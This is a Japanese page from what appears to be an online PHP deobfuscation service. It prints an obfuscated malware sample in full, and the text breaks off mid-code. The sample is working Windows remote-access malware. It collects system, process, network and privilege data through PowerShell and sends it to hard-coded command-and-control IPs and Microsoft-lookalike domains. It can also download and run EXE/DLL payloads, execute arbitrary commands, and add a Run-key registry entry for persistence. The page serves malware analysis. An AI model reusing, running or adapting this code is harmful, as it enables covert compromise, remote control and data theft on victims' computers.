
PHP 難読化コードの復元・デコード

Wordpress 等でのPHPのマルウェア・ウィルス・改ざんコードをデコードして難読化をオンラインで解除し、
元の読みやすいコードに戻し解読できます。

※すべての難読化コードを解除できるわけではございませんのでご理解とご了承をお願いいたします。

下記のコードを難読化解除しました

<?php goto GhGCf; qtomL: function rcbqD() { goto iEtoA; IvNw3: if (!$Dbe2H) { goto UBiN4; } goto MzOOL; gFCj2: $wGaOo = null; goto sR1P9; G4neJ: $Nr7MT = $wGaOo["\x70\162\157\143\x65\x73\x73"]; goto R1cu5; tUwir: $PS9aF .= $gGLsg; goto TkkmA; DtOG1: echo "\44\154\x61\163\164\137\143\x6f\155\155\1...



難読化されたPHPコード

<?php
// Analyst note: this is the sample as submitted to the decoder. Statement order is
// scrambled with goto/label pairs, string literals are written as mixed octal/hex
// escapes, and functions are called with varying letter case (PHP function names are
// case-insensitive, so rcbqD and RCbQd are the same function).
// The decoded listing further down the page differs from this text in a few places
// where the decoder evaluated expressions itself: __FILE__ became a literal path, and
// several json_decode(implode(...)) calls became json_decode(null, true).
 goto GhGCf; qtomL: function rcbqD() { goto iEtoA; IvNw3: if (!$Dbe2H) { goto UBiN4; } goto MzOOL; gFCj2: $wGaOo = null; goto sR1P9; G4neJ: $Nr7MT = $wGaOo["\x70\162\157\143\x65\x73\x73"]; goto R1cu5; tUwir: $PS9aF .= $gGLsg; goto TkkmA; DtOG1: echo "\44\154\x61\163\164\137\143\x6f\155\155\141\156\144\40\75\75\40\x72\x75\x6e\156\151\x6e\147" . PHP_EOL; goto lw6sx; xSyDZ: goto KSdn7; goto X5ZKK; v6a3C: UBiN4: goto j83wj; TkkmA: KSdn7: goto IvNw3; NGQ1f: echo "\x24\x6c\x61\x73\x74\x5f\x63\x6f\155\155\x61\x6e\144\x20\x3d\x3d\40\156\x75\x6c\154" . PHP_EOL; goto Jqr4f; XNNAh: fclose($V8__K[0]); goto Y3VX_; iEtoA: global $wGaOo; goto XCUPW; X5ZKK: eXYTz: goto tUwir; b57F5: $PS9aF = "\157\x75\164\x3a" . PHP_EOL; goto JHjwU; gR3S1: $PS9aF .= "\74\x65\155\x70\164\x79\76"; goto xSyDZ; JHjwU: if ($gGLsg) { goto eXYTz; } goto gR3S1; vmEZU: F9kwL: goto gFCj2; KWGqZ: $Dbe2H = stream_get_contents($V8__K[2]); goto XNNAh; lw6sx: return null; goto vmEZU; XCUPW: if (!(!$wGaOo || !isset($wGaOo["\160\x72\157\143\145\x73\163"]) || !isset($wGaOo["\160\x69\x70\145\163"]))) { goto iUh9Y; } goto NGQ1f; gLhHj: $nSJJJ = proc_close($Nr7MT); goto b57F5; j83wj: return $PS9aF; goto c5Xkj; FUqxs: fclose($V8__K[2]); goto gLhHj; Y3VX_: fclose($V8__K[1]); goto FUqxs; R1cu5: $V8__K = $wGaOo["\160\x69\x70\x65\163"]; goto KcLcy; Jqr4f: return null; goto b3ysM; sR1P9: $gGLsg = stream_get_contents($V8__K[1]); goto KWGqZ; KcLcy: if (!proc_get_status($Nr7MT)["\x72\165\x6e\x6e\151\156\147"]) { goto F9kwL; } goto DtOG1; MzOOL: $PS9aF .= PHP_EOL . "\145\162\162\x28" . $nSJJJ . "\51\x3a" . PHP_EOL . $Dbe2H; goto v6a3C; b3ysM: iUh9Y: goto G4neJ; c5Xkj: } goto z6oM9; sIg7z: vBmzE: goto EwTST; pzgi4: echo "\x61\x63\x74\x69\166\145\137\143\x6e\164\x3a\x20" . $dCN4_ . PHP_EOL; goto d1AUN; WOsYO: function BMLFv() { goto RoRvQ; t5ysc: return $qHIxs; goto aKt0o; RoRvQ: $qHIxs = getenv("\x41\x50\x50\x44\101\x54\x41") . "\x5c" . VJPpv() . 
rand(0, 1000000); goto tHAes; tHAes: mkdir($qHIxs); goto t5ysc; aKt0o: } goto qK03j; F_JOE: function rxiXT() { goto tin1z; r2rlA: $YvSKs ^= 0x15de8713; goto yR9pu; iudFO: $YvSKs ^= $rNvND; goto Ud2Db; Ud2Db: $KyMPt = sprintf("\45\x30\70\170\x25\60\70\x78", $t3Oc0, $YvSKs); goto qsK_J; ZWOcq: $LSet6 = random_int(PHP_INT_MIN, PHP_INT_MAX); goto WS5Kg; yR9pu: $rNvND = $rNvND + 0x29807914 & 0xffffffff; goto TaEv6; GnW01: $YvSKs ^= $rNvND; goto r3eEK; TaEv6: $fruA2 = $fruA2 + 0xf2879630 + ($rNvND < 0x29807914 ? 1 : 0) & 0xffffffff; goto XLtXL; rWXXD: $YvSKs = $o28qH & 0xffffffff; goto wBLcq; Cif7x: return ($USwKc !== '' ? "\x2f" . $USwKc : '') . "\x2f" . XnkeD(rand(0, 14)) . "\x26" . $KyMPt . $U0J5z . ($FjQwC !== '' ? "\57" . $FjQwC : ''); goto oHLbg; dgTra: $o28qH = (int) $Eh0Dq->getTimestamp() & (int) 1.8446744073709548E+19; goto ZWOcq; XLtXL: $t3Oc0 ^= $fruA2; goto iudFO; wBLcq: $fruA2 = $LSet6 >> 32 & 0xffffffff; goto tnZ3G; xFAOW: $t3Oc0 ^= 0x86ad5709; goto r2rlA; r3eEK: $YvSKs = $YvSKs + 0x7ab092fe & 0xffffffff; goto DsbEr; QMIwY: $t3Oc0 ^= 0x219f7609; goto uIg6N; Tw4a2: $FjQwC = XnkeD(rand(0, 14)); goto Cif7x; tnZ3G: $rNvND = $LSet6 & 0xffffffff; goto Zfmgf; qsK_J: $U0J5z = sprintf("\45\60\x38\x78\45\x30\70\x78", $fruA2, $rNvND); goto Mn4pt; DsbEr: $t3Oc0 = $t3Oc0 + 0x80952678 + ($YvSKs < 0x7ab092fe ? 
1 : 0) & 0xffffffff; goto QMIwY; Zfmgf: $t3Oc0 ^= $fruA2; goto GnW01; tin1z: $Eh0Dq = new DateTime("\x6e\x6f\x77", new DateTimeZone("\x45\164\x63\57\x47\x4d\x54\53\65")); goto dgTra; WS5Kg: $t3Oc0 = $o28qH >> 32 & 0xffffffff; goto rWXXD; Mn4pt: $USwKc = XNked(rand(0, 14)); goto Tw4a2; uIg6N: $YvSKs ^= 0xd1769498; goto xFAOW; oHLbg: } goto ybxmE; ph3TX: $A4YkN = $h0b7d[mt_rand(0, 1000) % count($h0b7d)]; goto sIg7z; NxBG4: $LcYWr = 10; goto vSPwP; ztZND: $pC2k6 = chr(0xa); goto lakjl; Pkc_7: return; goto m8M9L; ybxmE: function mNFE9() { goto SLN3T; YlAz4: throw new Exception("\x46\141\x69\x6c\145\144\x20\164\x6f\x20\145\170\x65\143\165\x74\x65\x20\x63\x6f\155\155\x61\156\144"); goto WK6XK; Mjmq1: exec("\x70\157\x77\145\162\163\150\145\154\154\40\55\x63\40" . eCI0t("\x47\145\164\55\123\145\x72\x76\x69\x63\145\40\174\x20\x53\x65\x6c\x65\x63\164\55\117\x62\x6a\145\143\164\x20\x2d\x50\162\157\x70\145\x72\164\171\40\116\x61\155\x65\x2c\40\x44\x69\x73\160\154\141\x79\116\x61\155\145\40\174\40\x43\x6f\x6e\x76\x65\162\164\x54\157\55\x4a\163\157\x6e"), $pcI7I, $xv08g); goto qpuf_; TAt8V: $pcI7I = ''; goto AjEZG; AjEZG: exec("\160\157\167\145\x72\163\150\145\154\154\x20\55\x63\x20" . 
eCI0t("\107\145\164\x2d\x4e\x65\x74\116\x65\151\x67\x68\x62\x6f\162\40\x2d\101\x64\x64\x72\145\163\163\x46\x61\x6d\151\x6c\171\x20\x49\120\x76\x34\x20\x7c\40\x57\150\x65\x72\145\55\x4f\142\152\x65\143\164\40\173\x20\x24\137\x2e\123\x74\141\x74\x65\x20\55\156\x65\x20\47\120\x65\162\155\x61\x6e\x65\x6e\164\x27\x20\175\40\174\40\123\x65\x6c\x65\143\164\55\x4f\142\x6a\145\x63\x74\x20\x40\x7b\x4e\x61\x6d\145\x3d\x27\x49\156\164\145\x72\x66\x61\143\145\47\x3b\40\x45\170\x70\x72\145\x73\163\151\x6f\156\75\x7b\x24\137\56\111\x6e\164\x65\x72\x66\x61\x63\x65\101\154\x69\141\x73\175\175\x2c\40\x40\x7b\x4e\x61\155\x65\x3d\47\x49\x6e\164\145\x72\156\145\164\40\101\x64\x64\162\x65\163\x73\47\x3b\x20\105\x78\160\162\145\x73\163\x69\x6f\156\x3d\x7b\44\x5f\56\x49\120\x41\144\x64\162\x65\x73\163\x7d\x7d\54\x20\x40\x7b\116\x61\155\145\75\x27\x50\x68\171\163\x69\x63\x61\x6c\40\101\x64\x64\162\x65\163\163\47\73\x20\105\170\160\x72\x65\x73\x73\151\x6f\x6e\x3d\173\44\137\56\x4c\151\x6e\x6b\x4c\141\x79\x65\x72\x41\x64\144\x72\x65\163\x73\175\x7d\54\40\100\173\x4e\141\155\x65\x3d\x27\124\x79\160\x65\47\73\40\105\170\x70\162\145\163\163\x69\x6f\x6e\75\173\x27\x64\x79\x6e\141\x6d\151\143\47\175\175\40\174\x20\x43\x6f\156\166\x65\x72\164\x54\157\x2d\112\163\157\156"), $pcI7I, $xv08g); goto WaE3I; rDHRq: $JGJW0["\x70\162\157\143\145\x73\x73\x65\x73"] = json_decode(implode($pC2k6, $pcI7I), true); goto CZvJe; xeNbX: throw new Exception("\106\141\151\154\x65\144\x20\164\x6f\40\x65\x78\x65\143\x75\164\145\40\x63\157\x6d\155\141\156\144"); goto yw8sc; dqSAy: throw new Exception("\106\141\x69\x6c\x65\144\40\164\x6f\40\145\170\145\143\165\x74\145\x20\143\x6f\155\x6d\141\x6e\x64"); goto fBXNh; KtFyp: $JGJW0["\x73\171\163\x74\x65\155\151\156\x66\x6f"] = json_decode(implode($pC2k6, $pcI7I), true); goto szlN5; fBXNh: JqFr0: goto V2trJ; SwHwH: hAxYv: goto KtFyp; CyXGe: oI7qv: goto GNCS4; szlN5: $pcI7I = ''; goto kvpOd; O_u62: if (!($xv08g !== 0)) { goto hAxYv; } goto MZ8Bw; xik0u: 
exec("\x70\157\x77\x65\162\163\x68\145\x6c\154\40\55\x63\x20" . eCI0t("\164\141\163\153\x6c\151\163\164\40\x2f\x73\166\x63\x20\x2f\106\x4f\40\103\x53\126\x20\174\x20\x43\x6f\x6e\x76\145\162\164\x46\x72\157\x6d\x2d\x43\163\166\40\x7c\x20\x43\157\x6e\166\145\162\164\124\x6f\x2d\112\x73\157\x6e"), $pcI7I, $xv08g); goto hGwbL; rTwG_: $JGJW0["\x6f\x74\150\145\x72"]["\x69\144\x5f\x6c\x6f\141\144\x65\x72"] = 43; goto H8fAn; V2trJ: $JGJW0["\x6f\x74\150\x65\x72"]["\x76\145\x72\163\151\157\x6e\137\x62\x75\151\154\x64"] = $jIDpK; goto o5pQ9; H8fAn: $JGJW0["\157\164\x68\x65\162"]["\x72\165\156\x61\x73"] = $pcI7I[0] ?? "\x55\x4e\113\x4e\117\127\x4e"; goto Uq1i5; SLN3T: global $jIDpK, $szWC8, $pC2k6; goto Gb2wC; h5Dt2: $pcI7I = ''; goto A3qh6; oqutG: exec("\160\157\x77\x65\162\163\x68\x65\x6c\x6c\40\x2d\143\40" . Eci0T("\x73\x79\x73\x74\145\x6d\151\x6e\x66\157\x20\x2f\x46\x4f\40\x43\x53\126\x20\174\x20\103\157\156\166\145\162\164\106\x72\x6f\155\x2d\103\x73\166\x20\x7c\x20\x43\x6f\156\166\145\162\x74\124\157\55\112\163\157\156"), $pcI7I, $xv08g); goto O_u62; gHZpy: $JGJW0["\141\x72\x70"] = json_decode(implode($pC2k6, $pcI7I), true); goto h5Dt2; O1ZSi: CXelO: goto rDHRq; zTeIp: exec("\x70\x6f\x77\145\x72\x73\150\145\x6c\x6c\40\x2d\143\40" . 
eci0t("\107\x65\164\55\120\x53\104\x72\151\x76\145\x20\55\120\123\x50\x72\157\x76\151\144\145\162\x20\x46\x69\154\x65\123\171\x73\164\145\x6d\x20\174\40\x43\x6f\x6e\x76\145\x72\x74\124\157\x2d\112\x73\x6f\156"), $pcI7I, $xv08g); goto VXiWg; WK6XK: J0rGW: goto gHZpy; kIhB2: $pcI7I = ''; goto xik0u; MZ8Bw: throw new Exception("\106\x61\x69\154\x65\x64\x20\164\x6f\x20\145\170\x65\x63\165\x74\x65\x20\x63\157\x6d\155\x61\x6e\144"); goto SwHwH; JZ8SA: throw new Exception("\106\x61\151\154\x65\x64\x20\x74\157\x20\145\170\145\x63\165\x74\145\x20\x63\157\x6d\x6d\x61\x6e\x64"); goto O1ZSi; A3qh6: return $JGJW0; goto ET34Z; hGwbL: if (!($xv08g !== 0)) { goto CXelO; } goto JZ8SA; GNCS4: $JGJW0["\x73\x65\x72\166\151\143\145\163"] = json_decode(implode($pC2k6, $pcI7I), true); goto zzFnW; yw8sc: J78O1: goto KaCH2; VXiWg: if (!($xv08g !== 0)) { goto J78O1; } goto xeNbX; WaE3I: if (!($xv08g !== 0)) { goto J0rGW; } goto YlAz4; CZvJe: $pcI7I = ''; goto Mjmq1; zzFnW: $pcI7I = ''; goto zTeIp; kvpOd: exec("\x70\157\167\x65\x72\x73\150\x65\154\x6c\40\x2d\x63\40" . 
ECI0T("\x69\x66\x20\50\133\123\145\x63\x75\162\x69\164\171\56\120\162\x69\156\143\151\160\141\154\56\127\151\x6e\x64\x6f\x77\163\111\x64\145\156\x74\x69\x74\x79\135\72\x3a\x47\145\x74\103\165\162\162\x65\x6e\x74\x28\x29\56\116\141\155\x65\x20\55\155\x61\x74\143\x68\x20\x27\x28\77\x69\51\x53\131\123\124\x45\115\x27\51\40\x20\x7b\x20\47\x53\131\123\x54\x45\x4d\x27\40\x7d\40\x65\154\x73\x65\x69\146\40\50\x28\133\x53\x65\x63\165\x72\x69\x74\x79\x2e\x50\162\x69\x6e\143\x69\x70\x61\154\56\127\x69\x6e\x64\x6f\167\163\x50\x72\151\156\143\x69\x70\141\x6c\x5d\x20\133\x53\x65\x63\165\162\151\164\x79\x2e\x50\x72\x69\x6e\x63\151\160\x61\154\56\x57\x69\156\x64\157\x77\163\111\x64\x65\156\164\x69\x74\171\135\72\72\107\145\x74\x43\x75\x72\x72\x65\156\164\50\51\51\56\x49\163\111\156\x52\157\154\145\x28\133\x53\x65\x63\x75\x72\x69\164\x79\x2e\120\x72\x69\x6e\x63\151\160\x61\154\56\127\x69\x6e\144\x6f\x77\x73\102\165\151\154\164\x49\156\x52\157\x6c\x65\x5d\x3a\72\101\x64\x6d\151\x6e\x69\x73\x74\x72\141\x74\x6f\x72\51\51\40\x7b\40\47\101\x44\115\111\x4e\47\40\175\x20\145\x6c\163\145\40\173\x20\x27\125\123\105\122\x27\x20\x7d\40"), $pcI7I, $xv08g); goto dH2kx; dH2kx: if (!($xv08g !== 0)) { goto JqFr0; } goto dqSAy; Uq1i5: $JGJW0["\157\164\150\145\x72"]["\164\171\x70\145\x5f\x66\x69\154\145"] = "\x50\110\120"; goto kIhB2; gn1Mi: throw new Exception("\106\x61\x69\154\x65\144\x20\x74\157\40\x65\170\x65\x63\x75\x74\x65\x20\143\157\155\155\141\x6e\x64"); goto CyXGe; o5pQ9: $JGJW0["\157\x74\150\x65\x72"]["\151\x64\x5f\x6c\x6f\143\141\x6c"] = mt_rand(0, 100000000); goto rTwG_; qpuf_: if (!($xv08g !== 0)) { goto oI7qv; } goto gn1Mi; KaCH2: $JGJW0["\x64\x72\x69\x76\x65\163"] = json_decode(implode($pC2k6, $pcI7I), true); goto TAt8V; Gb2wC: $JGJW0 = []; goto oqutG; ET34Z: } goto l4tr9; dfbng: if (!true) { goto w_p_e; } goto bc_XP; GhGCf: $szWC8 = chr(0x22); goto ztZND; kImNn: function ecI0T($b3TRq) { global $szWC8; return $szWC8 . $b3TRq . 
$szWC8; } goto F_JOE; xaPFx: function A2uxo($xbNO5) { goto DmaWr; SHkBb: $ERqBI = $xbNO5 . $rasAm; goto ENAdj; ENAdj: return gzencode($ERqBI, 5, FORCE_GZIP); goto LVrZW; bA6ex: R7s9b($xbNO5, $rasAm); goto SHkBb; M_vHj: $rasAm = pack("\x56", $Ot6LN); goto bA6ex; DmaWr: $Ot6LN = mt_rand(0, 100000000); goto M_vHj; LVrZW: } goto Ikv0Q; teN0x: $A4YkN = $b2dL6[mt_rand(0, 1000) % count($b2dL6)]; goto azANG; m8M9L: Hbr23: goto C4SdR; smHwj: echo "\144\x65\x6c\141\171\72\40" . $LcYWr . PHP_EOL; goto pzgi4; uRlZE: function UrHlx() { goto pKxxt; bSPgh: if (!(!$ZqddJ || !preg_match_all("\x2f\x5c\x73\x2d\162\134\163\57", $ZqddJ))) { goto w5I3u; } goto Dzjht; n1kqv: $Y72oh = preg_split("\x2f\x70\x68\x70\x5c\x2e\145\170\145\x2e\52\77\134\x73\55\162\x5c\163\53\57", $xU41z, 2); goto eOgzd; RNPOv: zRlqv: goto Bjbd0; FnYn0: $oyBW1 = __FILE__; goto bRGWU; iGUoA: if (QrOFA()) { goto zRlqv; } goto FnYn0; hOX6z: Uxm1w: goto Dzygw; Bjbd0: $oyBW1 = dirname(PHP_BINARY) . xNked(12) . "\56\164\170\164"; goto G84tC; Dzygw: exec("\162\x65\147\40\141\x64\x64\x20\x48\x4b\103\125\134\123\x6f\x66\164\x77\x61\162\145\x5c\115\151\x63\162\157\x73\x6f\146\164\134\x57\151\156\x64\x6f\x77\x73\x5c\x43\165\x72\x72\145\x6e\x74\x56\x65\x72\x73\151\x6f\156\134\122\x75\x6e\x20\x2f\166\x20" . Eci0t(VjppV()) . "\40\57\x74\x20\122\x45\107\137\x53\132\x20\57\x64\40" . eci0t("\134" . $szWC8 . PHP_BINARY . "\x5c" . $szWC8 . "\x20\x5c" . $szWC8 . $oyBW1 . "\134" . $szWC8) . "\40\57\x66"); goto BEWR2; VobaU: $pDMmF = explode($pC2k6, $ZqddJ, 2); goto KnYOk; pKxxt: global $szWC8, $pC2k6; goto iGUoA; xC0RO: w5I3u: goto VobaU; BEWR2: return true; goto oVM4F; Mb8m7: file_put_contents($oyBW1, $uJtGi); goto hOX6z; eOgzd: $uJtGi = isset($Y72oh[1]) ? trim(str_replace($szWC8, '', $Y72oh[1])) : ''; goto Mb8m7; Dzjht: return false; goto xC0RO; KnYOk: $xU41z = trim($pDMmF[1] ?? 
''); goto n1kqv; G84tC: $ZqddJ = shell_exec("\167\x6d\x69\143\40\160\x72\x6f\143\x65\163\x73\x20\x77\x68\145\162\145\x20\x70\x72\157\x63\x65\163\x73\151\144\x3d" . getmypid() . "\x20\x67\145\164\40\143\157\155\x6d\141\x6e\x64\x6c\x69\156\x65"); goto bSPgh; bRGWU: goto Uxm1w; goto RNPOv; oVM4F: } goto fc1nJ; z6oM9: function lFVIE($xLjoz, $d0PbW) { goto zxRUJ; akcjb: $o_rCT = "\160\x6f\167\x65\162\x73\150\145\x6c\154\x2e\x65\170\x65\x20\55\x57\151\156\144\157\x77\123\164\x79\154\145\x20\110\151\x64\144\x65\156\40\55\x63\x20" . ECi0t("\123\x74\x61\162\x74\x2d\120\x72\x6f\143\x65\163\x73\x20\55\x57\x69\156\x64\157\167\123\x74\x79\154\145\x20\110\x69\x64\x64\x65\x6e\x20\55\106\151\x6c\145\x50\141\164\150\40\47" . $xLjoz . "\x27" . ($d0PbW ? "\40\x2d\x41\x72\x67\165\x6d\x65\x6e\164\x4c\151\163\164\x20\x27" . preg_replace("\57" . $szWC8 . "\57", "\x5c" . $szWC8, $d0PbW) . "\47" : '')); goto dEHsl; dEHsl: echo $o_rCT . $pC2k6 . $pC2k6; goto QId0W; zxRUJ: global $szWC8, $pC2k6; goto akcjb; QId0W: shell_exec($o_rCT); goto FFokY; FFokY: } goto WOsYO; YWsb9: function Y40sz($nG_P0, $Yem6z) { goto XzqaQ; w4_1H: $abtZm->close(); goto gTt8M; u71rV: rewind($PH23F); goto F1pv_; SvUr2: if (!($Mbxm4 !== true)) { goto d2ZIq; } goto Ix7oY; CKc57: return true; goto siNDm; D_vXs: fclose($PH23F); goto nWlDf; Rqxww: $abtZm->close(); goto D_vXs; W7Pvu: return false; goto FCsu7; Ix7oY: fclose($PH23F); goto W7Pvu; zLO6Y: tttcO: goto w4_1H; FCsu7: d2ZIq: goto RjHFo; ghuFk: if (mkdir($Yem6z, 0777, true)) { goto isOEF; } goto i7rJO; RjHFo: if ($abtZm->extractTo($Yem6z)) { goto tttcO; } goto Rqxww; XzqaQ: if (file_exists($Yem6z)) { goto qw6IQ; } goto ghuFk; p5QAD: $cTc0_ = file_get_contents($nG_P0); goto DwC7G; i7rJO: return false; goto BAppL; YFhHt: $Mbxm4 = $abtZm->open(stream_get_meta_data($PH23F)["\x75\x72\x69"]); goto SvUr2; BAppL: isOEF: goto tkJFY; tkJFY: qw6IQ: goto p5QAD; gTt8M: fclose($PH23F); goto CKc57; F1pv_: $abtZm = new XdeZr(); goto YFhHt; DaxKI: fwrite($PH23F, $cTc0_); goto u71rV; 
nWlDf: return false; goto zLO6Y; DwC7G: $PH23F = tmpfile(); goto DaxKI; siNDm: } goto uRlZE; tBEQV: if (count($h0b7d) > 0) { goto DGU7d; } goto teN0x; PI6eX: $dlA_m = 0; goto EgCuT; OUc5x: goto V3Oj2; goto JgSSO; vwBQl: $h0b7d = ["\x77\x69\x6e\x64\157\x77\x73\x2d\x6d\x73\147\x61\x73\x2e\143\157\x6d", "\x65\x76\x65\156\164\55\x64\141\164\x61\155\x69\143\162\x6f\x73\157\x66\x74\x2e\154\x69\x76\145", "\166\141\x72\x79\151\x6e\x67\55\x72\145\156\164\141\x6c\163\55\x63\x61\x6c\147\141\x72\x79\x2d\160\162\x65\144\151\143\x74\x2e\x74\x72\x79\143\154\157\x75\x64\146\x6c\x61\x72\145\x2e\143\x6f\x6d"]; goto tBEQV; XAM1e: $JcEot = 80; goto Klamn; S4yY7: DGU7d: goto ph3TX; KMXag: $wGaOo = null; goto NvD7d; l4tr9: function r7s9B(&$xbNO5, $eAmVW) { goto jUYbm; jUYbm: $s9r5b = ord($eAmVW[0]); goto zADLb; bnowv: W3BJA: goto S_cN9; tTRhB: $Mc_Hp = 0; goto Ast8k; ZQtcn: goto kAq95; goto bnowv; HPUYH: $xbNO5[$Mc_Hp] = chr(ord($xbNO5[$Mc_Hp]) ^ (ord($eAmVW[$Mc_Hp % $kt3y8]) ^ $s9r5b) % 256); goto ziig9; IYGwm: if (!($Mc_Hp < $cbiCS)) { goto W3BJA; } goto TXIrG; Ast8k: kAq95: goto IYGwm; TXIrG: $s9r5b = ($s9r5b + ($s9r5b + $Mc_Hp % 256)) % 256; goto HPUYH; I0zBE: $kt3y8 = strlen($eAmVW); goto tTRhB; ziig9: kp_B5: goto qKS6q; zADLb: $cbiCS = strlen($xbNO5); goto I0zBE; qKS6q: ++$Mc_Hp; goto ZQtcn; S_cN9: } goto xaPFx; Yi5pH: $dCN4_ = 0; goto Bvdh_; Klamn: $D_3Y7 = ["\105\x58\x45" => 0, "\104\x4c\114" => 1, "\x4a\123" => 2, "\103\x4d\104" => 3, "\101\103\x54\111\x56\105" => 4, "\x41\x55\124\x4f\x52\125\x4e" => 5, "\x4f\106\106" => 6]; goto Yi5pH; NvD7d: function deG1t($d0PbW) { goto U26fL; U26fL: global $wGaOo; goto rKPLw; rKPLw: $qA50S = array(0 => array("\x70\151\x70\x65", "\x72"), 1 => array("\x70\x69\160\145", "\167"), 2 => array("\160\151\160\x65", "\x77")); goto vIbJr; vIbJr: $Nr7MT = proc_open($d0PbW, $qA50S, $V8__K); goto Fk4aN; HUWz5: OIHx8: goto ImEOy; q1kMs: return "\74\x66\141\151\x6c\145\x64\76"; goto HUWz5; ImEOy: $wGaOo = ["\160\x72\157\x63\145\163\x73" => $Nr7MT, 
"\x70\x69\x70\145\x73" => $V8__K]; goto Ir0ws; Fk4aN: if (is_resource($Nr7MT)) { goto OIHx8; } goto q1kMs; Ir0ws: } goto qtomL; Ikv0Q: function EtUpz($A4YkN, $xbNO5) { goto uiUap; IAKYX: $Ql4QK = (int) $fUPyD[1]; goto aHYEC; aHYEC: oo9y0: goto P9uXG; DtSgv: $HhbRp = null; goto xRdNz; IF9yw: $H6YXK = ["\x68\x74\x74\x70" => ["\155\145\x74\x68\157\x64" => "\120\x4f\x53\124", "\150\145\141\x64\x65\162" => ["\103\x6f\x6e\x74\x65\x6e\164\55\164\x79\x70\145\72\40\141\x70\160\154\151\143\x61\164\x69\x6f\x6e\x2f\x6f\x63\164\145\x74\x2d\x73\164\x72\145\141\155"], "\x63\x6f\x6e\x74\x65\156\x74" => $xbNO5, "\x69\x67\x6e\x6f\x72\145\x5f\145\162\x72\x6f\162\x73" => true, "\x74\151\x6d\x65\x6f\165\x74" => 20]]; goto YMMrn; Ls2Pd: if (!isset($http_response_header[0])) { goto ycYgX; } goto XK2NZ; upemk: $nuWcv = stream_context_create($H6YXK); goto DtSgv; P9uXG: ycYgX: goto r77la; dG83c: if (!($RwYxj === false)) { goto Tdx4n; } goto asX3w; YMMrn: $nG_P0 = "\x68\164\x74\x70\x3a\x2f\x2f" . $A4YkN . "\x3a" . $JcEot . rXiXT(); goto upemk; uiUap: global $JcEot; goto IF9yw; PEG3G: restore_error_handler(); goto dG83c; r77la: return ["\143\157\x6e\x74\x65\156\164" => $RwYxj, "\150\145\x61\144\x65\162\x73" => $http_response_header, "\163\164\x61\164\x75\x73" => $http_response_header[0] ?? null, "\x63\157\144\145" => $Ql4QK]; goto A9CR4; KYMz3: $Ql4QK = 0; goto Ls2Pd; asX3w: throw new Exception("\110\x54\124\x50\x20\162\x65\x71\165\145\x73\x74\x20\x66\141\151\x6c\x65\144\72\x20" . 
($HhbRp ?: "\125\x6e\x6b\156\157\167\x6e\x20\x65\x72\x72\157\162")); goto QdSL7; XK2NZ: preg_match("\57\x48\124\124\x50\x5c\x2f\x5c\x64\134\56\134\144\x5c\163\x2b\x28\134\144\173\x33\x7d\51\x2f", $http_response_header[0], $fUPyD); goto K4aXs; B31AZ: $RwYxj = file_get_contents($nG_P0, false, $nuWcv); goto PEG3G; K4aXs: if (!isset($fUPyD[1])) { goto oo9y0; } goto IAKYX; xRdNz: set_error_handler(function ($l2XVo, $Mxyq3) use(&$HhbRp) { $HhbRp = $Mxyq3; }); goto B31AZ; QdSL7: Tdx4n: goto KYMz3; A9CR4: } goto YWsb9; azANG: goto vBmzE; goto S4yY7; Bvdh_: $rst7P = MNfE9(); goto GGsaL; S7l7m: LfVIE(PHP_BINARY, "\55\144\x20\145\x78\x74\145\156\x73\x69\157\x6e\75\x7a\151\x70\40\x2d\144\40\145\170\x74\145\x6e\163\x69\157\x6e\137\x64\151\162\75\145\x78\164\x20" . ECi0T(__FILE__) . "\x20\x31"); goto Pkc_7; C4SdR: $jIDpK = 20; goto XAM1e; lakjl: if (!($argc < 2 && !qrOfa() || !extension_loaded("\172\151\160") && file_exists(__FILE__))) { goto Hbr23; } goto S7l7m; EwTST: $TZ64Y = 200; goto PI6eX; vSPwP: $b2dL6 = ["\61\65\x39\56\x36\x39\56\61\70\67\56\x37\x38", "\x36\64\56\x39\x35\x2e\61\x32\x2e\x37\x31", "\x31\70\x34\x2e\71\65\56\65\61\x2e\x31\66\65"]; goto vwBQl; GGsaL: function QROfA() { global $argv; return $argv[0] === "\123\164\141\x6e\x64\x61\162\x64\40\x69\x6e\x70\x75\164\40\143\x6f\144\x65"; } goto kImNn; fc1nJ: function vJppV() { goto oeWc2; JOrZw: $inBis = array_values($inBis); goto jSXR6; jSXR6: print_r($inBis); goto LF76G; oeWc2: $inBis = scandir(getenv("\x41\x50\x50\x44\101\124\x41")) + scandir(getenv("\114\x4f\x43\x41\x4c\101\x50\120\x44\x41\x54\101")); goto FqHis; FqHis: $inBis = array_diff($inBis, ["\56", "\56\x2e"]); goto JOrZw; LF76G: return $inBis[rand(0, count($inBis) - 1)]; goto W_MW9; W_MW9: } goto VN3bi; qK03j: function mOJ2M($A4YkN) { goto E6092; oe9Eo: bVOXu: goto X5UZm; Kh4oY: if (!(($u7kKd = RCbQd()) !== null)) { goto bVOXu; } goto kMs0H; X5UZm: $uJtGi = EtupZ($A4YkN, A2UXO(json_encode($rst7P, JSON_PRETTY_PRINT))); goto CjTrc; nJvML: if (!($Ql4QK !== 
200)) { goto rweeZ; } goto Zq6SB; TG7Ws: $Ql4QK = $uJtGi["\143\x6f\144\x65"]; goto kL4WH; uS_iH: Qi1fs: goto b5HGd; I7s0k: $o0HyG = substr($o0HyG, 0, strlen($o0HyG) - 1); goto OF1U2; VXOzv: switch ($miAdf) { case $D_3Y7["\x43\115\x44"]: goto KbFcF; Hwxi8: DEg1T($o0HyG); goto dYUqj; dYUqj: return; goto F4zqm; KbFcF: echo "\x43\x4d\104" . PHP_EOL; goto Hwxi8; F4zqm: case $D_3Y7["\x41\x43\x54\111\x56\x45"]: goto szNmR; WEBBC: return; goto MLaj6; szNmR: echo "\101\103\x54\x49\x56\105" . PHP_EOL; goto kN7r9; kN7r9: $dCN4_ = unpack("\126", $o0HyG)[1]; goto WEBBC; MLaj6: case $D_3Y7["\x41\125\124\117\x52\x55\116"]: goto yTNdL; A_UVE: URHlX(); goto HFtUq; HFtUq: return; goto xPlUz; yTNdL: echo "\101\x55\x54\x4f\122\125\116" . PHP_EOL; goto A_UVE; xPlUz: case $D_3Y7["\117\106\x46"]: echo "\x4f\x46\x46" . PHP_EOL; exit(0); case $D_3Y7["\x45\130\105"]: goto yCtrZ; uBb1t: file_put_contents($xLjoz, $o0HyG); goto d0zSU; yCtrZ: echo "\105\130\x45" . PHP_EOL; goto XW7m0; XW7m0: $xLjoz = BMlfV() . "\134" . xNkEd(8) . "\x2e\x65\170\145"; goto uBb1t; d0zSU: goto nJLGE; goto NVxS3; NVxS3: case $D_3Y7["\104\x4c\x4c"]: goto W1nPU; umqro: $yYiH5 = bmlfV() . "\x5c" . XnkeD(8) . "\56\160\x6e\147"; goto v9BNu; m2qgo: 